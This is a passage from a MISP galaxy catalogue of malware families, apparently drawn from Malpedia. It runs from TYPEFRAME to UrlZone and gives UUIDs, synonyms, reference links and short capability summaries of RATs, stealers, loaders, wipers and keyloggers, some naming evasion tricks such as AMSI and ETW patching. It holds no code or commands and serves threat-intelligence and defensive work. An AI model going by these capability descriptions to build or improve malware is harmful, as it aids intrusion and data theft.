It supports ~25 commands that include operations on the victim's filesystem, manipulation of its configuration, modification of the system's firewall, the download and execution of additional tools from the attacker's C&C, and uninstallation via a self-deleting batch file. The commands are indexed by 16-bit integers, starting with the value 0x8000.
The RAT uses RC4 for decryption of its binary configuration. It has a statically linked OpenSSL 0.9.8k library used for SSL communication.
Internal MISP references
UUID bcc18617-5310-47f0-be30-e2fef6252359
which can be used as unique global reference for TYPEFRAME
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TypeHash
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TypeHash.
Known Synonyms |
---|
SkinnyD |
Internal MISP references
UUID d7b0ccc8-051c-4ab1-908e-3bd1811d9e2e
which can be used as unique global reference for TypeHash
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Typhon Stealer
According to PCrisk, Typhon is a stealer-type malware written in the C# programming language. Newer versions of this program are called Typhon Reborn (TyphonReborn). Malware within this classification is designed to extract data from infected systems. The older variants of Typhon have a broader range of functionalities, while Typhon Reborn versions are streamlined stealers.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Typhon Stealer.
Known Synonyms |
---|
Typhon Reborn V2 |
Internal MISP references
UUID fb5e364c-0f91-4b35-89cc-52eb4fc2a338
which can be used as unique global reference for Typhon Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tyupkin
Internal MISP references
UUID c28e9055-b656-4b7a-aa91-fe478a83fe4c
which can be used as unique global reference for Tyupkin
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf - webarchive
- https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html - webarchive
- https://www.lastline.com/labsblog/tyupkin-atm-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
T-Cmd
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular T-Cmd.
Known Synonyms |
---|
t_cmd |
Internal MISP references
UUID 892aa73e-7cb5-4eb5-bcb7-e9864bd03af2
which can be used as unique global reference for T-Cmd
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
T-RAT 2.0
Internal MISP references
UUID fb9e9ade-b154-43ba-a0ea-550322454acf
which can be used as unique global reference for T-RAT 2.0
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
UACMe
A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UACMe.
Known Synonyms |
---|
Akagi |
Internal MISP references
UUID ccde5b0d-fe13-48e6-a6f4-4e434ce29371
which can be used as unique global reference for UACMe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
UDPoS
Internal MISP references
UUID 5d05d81d-a0f8-496d-9a80-9b04fe3019fc
which can be used as unique global reference for UDPoS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
UFR Stealer
Information stealer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UFR Stealer.
Known Synonyms |
---|
Usteal |
Internal MISP references
UUID a24bf6d9-e177-44f2-9e61-8cf3566e45eb
which can be used as unique global reference for UFR Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Uiwix
Internal MISP references
UUID 5e362cd1-bc5c-4225-b820-00ec7ebebadd
which can be used as unique global reference for Uiwix
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Umbral
Umbral is a data-stealing Trojan that targets Windows systems. It spreads through phishing emails and malicious attachments. Once installed, Umbral can steal a variety of data, including usernames, passwords, online banking credentials, and confidential files. It can also change computer settings and execute harmful commands. Umbral is a serious security threat and should be removed immediately if found.
Internal MISP references
UUID 449a8708-d0ec-40c8-af7c-ea6960d11659
which can be used as unique global reference for Umbral
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
UnderminerEK
Internal MISP references
UUID 788b5c01-6609-4a3e-8922-5734fb6897b4
which can be used as unique global reference for UnderminerEK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 001
Internal MISP references
UUID 72961adc-ace1-4593-99f1-266119ddeccb
which can be used as unique global reference for Unidentified 001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 003
Internal MISP references
UUID 0e435b5d-37df-47cc-a1c4-1afb82df83d1
which can be used as unique global reference for Unidentified 003
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 006
Internal MISP references
UUID c0a40d42-33bb-4eca-8121-f636aeec14c6
which can be used as unique global reference for Unidentified 006
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 013 (Korean)
Internal MISP references
UUID b1cc4c79-30a5-485d-bd7f-8625c1cb5956
which can be used as unique global reference for Unidentified 013 (Korean)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 020 (Vault7)
Internal MISP references
UUID 40c66571-164c-4050-9c84-f37c9cd84055
which can be used as unique global reference for Unidentified 020 (Vault7)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 022 (Ransom)
Internal MISP references
UUID 5424d89e-1b7a-4632-987b-67fd27621d6f
which can be used as unique global reference for Unidentified 022 (Ransom)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 023
Internal MISP references
UUID a936a595-f03d-4d8c-848e-2a3525c0415b
which can be used as unique global reference for Unidentified 023
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 024 (Ransomware)
Internal MISP references
UUID acf6c476-847c-477a-b640-18a5c99e3c2b
which can be used as unique global reference for Unidentified 024 (Ransomware)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 025 (Clickfraud)
Internal MISP references
UUID f43a0e38-2394-4538-a123-4a0457096058
which can be used as unique global reference for Unidentified 025 (Clickfraud)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 028
Internal MISP references
UUID 22a686d8-dd35-4a29-9437-b0ce7b5c204b
which can be used as unique global reference for Unidentified 028
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 029
Internal MISP references
UUID aff47054-7130-48ca-aa2c-247bdf44f180
which can be used as unique global reference for Unidentified 029
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 030 (Ransomware)
Unnamed ransomware that camouflages as a program performing system cleanup called "System Analyzer Pro".
Internal MISP references
UUID 7287a0b0-b943-4007-952f-07b9475ec184
which can be used as unique global reference for Unidentified 030 (Ransomware)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 031
Internal MISP references
UUID 122c1c9c-3131-4014-856c-7e8a0da57a6e
which can be used as unique global reference for Unidentified 031
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 037
Internal MISP references
UUID d073f9e5-8aa8-4e66-ba47-f332759199a2
which can be used as unique global reference for Unidentified 037
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 038
Internal MISP references
UUID d53e96c5-abfa-4be4-bb33-0a898c5aff58
which can be used as unique global reference for Unidentified 038
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 039
Internal MISP references
UUID 97c1524a-c052-49d1-8770-14b513d8a830
which can be used as unique global reference for Unidentified 039
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 041
Internal MISP references
UUID 88d70171-fc89-44d1-8931-035c0b095247
which can be used as unique global reference for Unidentified 041
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 042
Internal MISP references
UUID 168bf2a1-45a5-41ac-b364-5740e7ce9757
which can be used as unique global reference for Unidentified 042
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 044
Internal MISP references
UUID df9c8440-b4da-4226-b982-e510d06cf246
which can be used as unique global reference for Unidentified 044
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 045
Internal MISP references
UUID 4cb8235a-7e70-4fad-9244-69215750d559
which can be used as unique global reference for Unidentified 045
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 047
RAT written in Delphi used by Patchwork APT.
Internal MISP references
UUID 18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2
which can be used as unique global reference for Unidentified 047
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 052
Internal MISP references
UUID 80c12fcd-e5ef-4549-860d-7928363022f9
which can be used as unique global reference for Unidentified 052
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 053 (Wonknu?)
Internal MISP references
UUID b60e32bd-158a-42b9-ac21-288bca4c8233
which can be used as unique global reference for Unidentified 053 (Wonknu?)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 057
Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).
Internal MISP references
UUID 1b8e86ab-57b2-4cd9-a768-a7118b4eb4be
which can be used as unique global reference for Unidentified 057
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 058
Internal MISP references
UUID bab52335-be9e-4fad-b68e-f124b0d69bbc
which can be used as unique global reference for Unidentified 058
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 066
This .NET executable can receive commands from a C2 server, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT called PeppyRAT.
Internal MISP references
UUID e78c402f-998b-43ff-8102-f54838afcb8b
which can be used as unique global reference for Unidentified 066
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 067
Internal MISP references
UUID 224066ee-4266-44a3-8ea2-b5d7b9b4969a
which can be used as unique global reference for Unidentified 067
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 068
Internal MISP references
UUID 26bfad72-59d8-456e-a200-eb18e614e5cb
which can be used as unique global reference for Unidentified 068
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 069 (Zeus Unnamed2)
Zeus derivative, no known public references.
Internal MISP references
UUID cc66d112-2ff5-462c-b029-15458d51f8a7
which can be used as unique global reference for Unidentified 069 (Zeus Unnamed2)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 070 (Downloader)
Unidentified downloader, possibly related to KONNI.
Internal MISP references
UUID 0bdef005-fd36-4ce0-a215-d49bf05b8fb8
which can be used as unique global reference for Unidentified 070 (Downloader)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 071 (Zeus Unnamed1)
Internal MISP references
UUID cc7de9da-dc33-4cf8-9388-986b001fad63
which can be used as unique global reference for Unidentified 071 (Zeus Unnamed1)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 072 (Metamorfo Loader)
MSI-based loader that has been observed as a stager for win.metamorfo.
Internal MISP references
UUID f2979fee-603d-496e-a526-d622e9cba84f
which can be used as unique global reference for Unidentified 072 (Metamorfo Loader)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 074 (Downloader)
Internal MISP references
UUID 4b60bda2-c587-4069-ace1-6283891d5faf
which can be used as unique global reference for Unidentified 074 (Downloader)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074 - webarchive
- https://blog.vincss.net/2019/12/re009-phan-tich-ma-doc-ke-hoach-nhiem-vu-trong-tam-2020.html - webarchive
- https://blog.vincss.net/vi/re009-phan-tich-ma-doc-ke-hoach-nhiem-vu-trong-tam-nam-2020-doc-dinh-kem-email-phishing-2/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 075
Unpacked http_dll.dat from the blog post.
Internal MISP references
UUID 66f26a60-ab6a-4b7c-bd85-afdc44dbcfdd
which can be used as unique global reference for Unidentified 075
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 076 (Higaisa LNK to Shellcode)
Internal MISP references
UUID 4d5d0798-9cb3-4f26-8c98-db8d7190d187
which can be used as unique global reference for Unidentified 076 (Higaisa LNK to Shellcode)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 077 (Lazarus Downloader)
Internal MISP references
UUID ca8a1900-ea9a-4d83-8873-6c48ac12da9a
which can be used as unique global reference for Unidentified 077 (Lazarus Downloader)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077 - webarchive
- https://twitter.com/ccxsaber/status/1277064824434745345 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 078 (Zebrocy Nim Loader?)
Suspected Zebrocy loader written in Nim.
Internal MISP references
UUID 99099489-eeb9-415a-a3b8-6133e774bed0
which can be used as unique global reference for Unidentified 078 (Zebrocy Nim Loader?)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 080
This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first-stage custom installer utilizes the same classes. The Trojan uses the HTTP Server API to filter HTTPS packets on port 443 and parse commands. It is also used by attackers to gather a target's data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.
Internal MISP references
UUID f12b3029-87a1-4632-855f-4fef784210bd
which can be used as unique global reference for Unidentified 080
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 083 (AutoIT Stealer)
Internal MISP references
UUID 438ab9a3-3e2b-4241-8bcb-e61c2d118772
which can be used as unique global reference for Unidentified 083 (AutoIT Stealer)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 085
A RAT written in .NET, potentially used by Transparent Tribe.
Internal MISP references
UUID f80e8948-8e1e-4ecf-8d5e-08148e4dd2b0
which can be used as unique global reference for Unidentified 085
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 087
Symantec describes this family as an unidentified tool set used to target a range of organizations in South East Asia. The campaign was first noticed in September 2020.
Internal MISP references
UUID a4c9861e-93c6-4b2b-aa2d-71c1405375b4
which can be used as unique global reference for Unidentified 087
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 088 (Nim Ransomware)
Ransomware written in Nim.
Internal MISP references
UUID d7f1e6cf-1880-426a-881a-619309f32c37
which can be used as unique global reference for Unidentified 088 (Nim Ransomware)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 091
Avast found this unidentified RAT, which abuses a code-signing certificate by the Philippine Navy. It is statically linked against OpenSSL 1.1.1g.
Internal MISP references
UUID 33c8e201-9cd1-4a44-9380-3e3d3d6894c3
which can be used as unique global reference for Unidentified 091
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 092 (Confucius Backdoor)
According to Antiy CERT, this is a C++ backdoor that was first discovered in an attack by Confucius in September 2020. Its main functions include creating scheduled tasks, retrieving process information, retrieving network adapter information, retrieving disk drive information, uploading files, downloading files, executing files, and providing shell access.
Internal MISP references
UUID 22ed4f2a-2ed4-4235-97c3-69913bc80a00
which can be used as unique global reference for Unidentified 092 (Confucius Backdoor)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 093 (Sidewinder)
Check Point Research observed this malware being used by Sidewinder.
Internal MISP references
UUID 9b7dfe8f-c06e-4803-9792-48ca369e80b3
which can be used as unique global reference for Unidentified 093 (Sidewinder)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 095 (Iranian Wiper)
Wiper, using EldoS RawDisk for low-level access to disks.
Internal MISP references
UUID 925f7a39-9674-4209-a31a-e09c27117328
which can be used as unique global reference for Unidentified 095 (Iranian Wiper)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095 - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-264a - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/aa22-264a-iranian-cyber-actors-conduct-cyber-operations-against-the-government-of-albania.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 096 (Keylogger)
Keylogger.
Internal MISP references
UUID 0c87cf0d-fa54-4962-817d-eac4c817b21a
which can be used as unique global reference for Unidentified 096 (Keylogger)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 097 (Polonium Keylogger)
Internal MISP references
UUID 32fe5b04-1af6-4696-a329-604a9f637c85
which can be used as unique global reference for Unidentified 097 (Polonium Keylogger)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 098 (APT29 Slack Downloader)
Internal MISP references
UUID db87fd2d-08ff-431d-86b8-35e31c9fcc9b
which can be used as unique global reference for Unidentified 098 (APT29 Slack Downloader)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_098 - webarchive
- https://ti.qianxin.com/blog/articles/analysis-of-apt29%27s-attack-activities-against-italy/ - webarchive
- https://www.freebuf.com/articles/paper/339618.html - webarchive
- https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/ - webarchive
- https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 099 (APT29 Dropbox Loader)
This malware uses Dropbox for C2 and was spread via a spear-phishing attack against government organizations. It is different from win.boombox, which is another APT29-attributed malware using Dropbox (written in .NET).
Internal MISP references
UUID 541a0a05-5c7f-4646-a96b-a4d26d5fa89d
which can be used as unique global reference for Unidentified 099 (APT29 Dropbox Loader)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099 - webarchive
- https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/APT29_C2-Client_Dropbox_Loader/APT29-DropboxLoader_analysis.md - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 100 (APT-Q-12)
Internal MISP references
UUID 0ee92ce5-e33d-4393-a466-6b5f6a1ca6a5
which can be used as unique global reference for Unidentified 100 (APT-Q-12)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 103 (FIN8)
A malware that uses .NET to load unmanaged (shell)code and has some resemblance to BADHATCH; the IP found in the sample was referred to in coverage of WHITERABBIT ransomware attacks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Unidentified 103 (FIN8).
Known Synonyms |
---|
Sardonic |
Internal MISP references
UUID 07106811-cd07-4d05-906d-c05208758b00
which can be used as unique global reference for Unidentified 103 (FIN8)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 104
Internal MISP references
UUID ec530093-5ffc-45f1-b04d-accf3269b2d2
which can be used as unique global reference for Unidentified 104
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 105
Internal MISP references
UUID 07464f74-f587-4266-b828-448c67d2bd85
which can be used as unique global reference for Unidentified 105
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 106
This is possibly related to the MATA framework / Dacls.
Internal MISP references
UUID da2d8044-ed12-4951-bcd8-fd1e1335244a
which can be used as unique global reference for Unidentified 106
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_106 - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/dark-river-you-can-t-see-them-but-they-re-there/ - webarchive
- https://www.virustotal.com/gui/file/3c1cfc2b8b7e5c2d713ec5f329aa58a6b56a08240199761ba6da91e719d30705/detection - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/18092216/Updated-MATA-attacks-Eastern-Europe_full-report_ENG.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 107 (APT29)
Small shellcode downloader, likely used by APT29.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Unidentified 107 (APT29).
Known Synonyms |
---|
ICEBEAT |
Internal MISP references
UUID e83a3731-9c84-4e36-a2da-9e6c9c2461d7
which can be used as unique global reference for Unidentified 107 (APT29)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_107 - webarchive
- https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing - webarchive
- https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA%3D%3D&mid=2247494783&idx=1&sn=612cf3cea1ef62e04bfb6bd0ce3b6b65&chksm=f9ed80c0ce9a09d6f5edc1424df5260cb9a9cf55fe92bd922407eef960650e91ec8cc46933ab&scene=178&cur_album_id=1375769135073951745 - webarchive
- https://lab52.io/blog/2344-2/ - webarchive
- https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs#a3 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 108
Internal MISP references
UUID ee09eba1-e96e-476f-9372-e99218d8ab90
which can be used as unique global reference for Unidentified 108
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 109 (Lazarus?)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Unidentified 109 (Lazarus?).
Known Synonyms |
---|
IMEEX |
Internal MISP references
UUID ad37d6ad-e9b7-4652-8a2e-502b170932e7
which can be used as unique global reference for Unidentified 109 (Lazarus?)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 110 (RustyFlag)
According to Deep Instinct, this information stealer is written in Rust and was observed in Operation Rusty Flag.
Internal MISP references
UUID 00dac929-3038-4fc1-a1a5-0fd895126e92
which can be used as unique global reference for Unidentified 110 (RustyFlag)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 112 (Rust-based Stealer)
A Rust-based stealer, observed by Seqrite, along with TTPs overlapping with Pakistan-linked APT groups.
Internal MISP references
UUID 1f50fa09-9c0f-40f8-9431-bd122dd347ff
which can be used as unique global reference for Unidentified 112 (Rust-based Stealer)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 113 (RAT)
According to Phylum, this is a RAT with these characteristics:
- Registers as a scheduled task.
- Receives commands from a remote server using web sockets.
- Installs Chrome extensions to Secure Preferences.
- Configures AnyDesk, hides the screen, and disables shutting down Windows.
- Captures keyboard and mouse events.
- Collects information about files, browser extensions, and browser history.
Internal MISP references
UUID 24f6e2e6-69c0-4a43-9036-cf275d3aa7ee
which can be used as unique global reference for Unidentified 113 (RAT)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 114 (APT28 InfoStealer)
According to Trend Micro, this is a small information stealer written in .NET that pushes its loot to a benign file sharing service and does not have a direct C&C callback.
Internal MISP references
UUID 1f59adb5-43e1-438b-b1c0-18af13ee3b12
which can be used as unique global reference for Unidentified 114 (APT28 InfoStealer)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 115 (Nim Loader)
According to Walmart, this is a loader written in Nim that contains an AmsiScanBuffer patch followed by an EtwEventWrite patch, and that will download/decrypt a payload via AES CFB and inject it into a hardcoded process target (e.g. explorer.exe).
Internal MISP references
UUID 63e6b775-eecc-462d-ae3c-31c03375e99e
which can be used as unique global reference for Unidentified 115 (Nim Loader)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 116 (Miner)
This malware family delivers its artifacts packed with free and generic packers. It writes files to Windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.
Internal MISP references
UUID ba7706c1-7d2a-4031-9acc-cb862860da1a
which can be used as unique global reference for Unidentified 116 (Miner)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 117 (Donot Loader)
Internal MISP references
UUID ac2bc9a6-d30d-40a3-9bb4-541f5c1e3d2b
which can be used as unique global reference for Unidentified 117 (Donot Loader)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_117 - webarchive
- https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247501270&idx=1&sn=203ae98a60ffc172cb9e06a1b95116c6&chksm=f9c1f6dfceb67fc916f29b04e9e63fe81a1f916d575ae8c32250fb954ca9619153ba864e118d&scene=178&cur_album_id=1955835290309230595 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unlock92
Internal MISP references
UUID 036e657f-a752-4a4c-bb30-f15c24d954e6
which can be used as unique global reference for Unlock92
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
UPAS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UPAS.
Known Synonyms |
---|
Rombrast |
Internal MISP references
UUID b64ea39b-3ec2-49e3-8992-02d71c21b1bd
which can be used as unique global reference for UPAS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Upatre
Upatre is primarily a downloader. It was discovered in 2013 and has been widely updated since. Upatre is responsible for delivering further malware to victims; in particular, Upatre was a prolific delivery mechanism for Gameover P2P in 2013-2014 and then for Dyre in 2015.
Internal MISP references
UUID 925390a6-f88d-46dc-96ae-4ebc9f0b50b0
which can be used as unique global reference for Upatre
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre - webarchive
- https://secrary.com/ReversingMalware/Upatre/ - webarchive
- https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/ - webarchive
- https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/ - webarchive
- https://unit42.paloaltonetworks.com/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Urausy
Internal MISP references
UUID 5af4838f-1b4d-4f0b-bd27-50ef532e84f7
which can be used as unique global reference for Urausy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
UrlZone
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UrlZone.
Known Synonyms |
---|
Bebloh |
Shiotob |
Internal MISP references
UUID ed9f995b-1b41-4b83-a978-d956670fdfbe
which can be used as unique global reference for UrlZone
in MISP communities and other software using the MISP galaxy
External references
